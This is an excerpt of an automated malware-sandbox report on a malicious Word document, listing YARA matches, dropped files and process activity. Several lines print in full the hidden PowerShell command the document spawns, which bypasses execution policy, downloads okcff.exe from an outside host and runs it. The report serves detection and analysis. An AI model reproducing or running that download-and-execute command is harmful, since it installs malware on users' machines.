                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    barindex
                    Yara detected Costura Assembly LoaderShow sources
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Suspicious powershell command line foundShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D863D pushfd ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7F95 pushad ; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7FF5 pushfd ; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D87E0 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0211EBEB push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181163 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181464 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02189840 push FFFFFF8Bh; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021ABD19 pushfd ; iretd
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_054297B4 push 850FD83Bh; ret
                    Source: okcff[1].exe.0.drStatic PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

                    Persistence and Installation Behavior:

                    barindex
                    Tries to download and execute files (via powershell)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
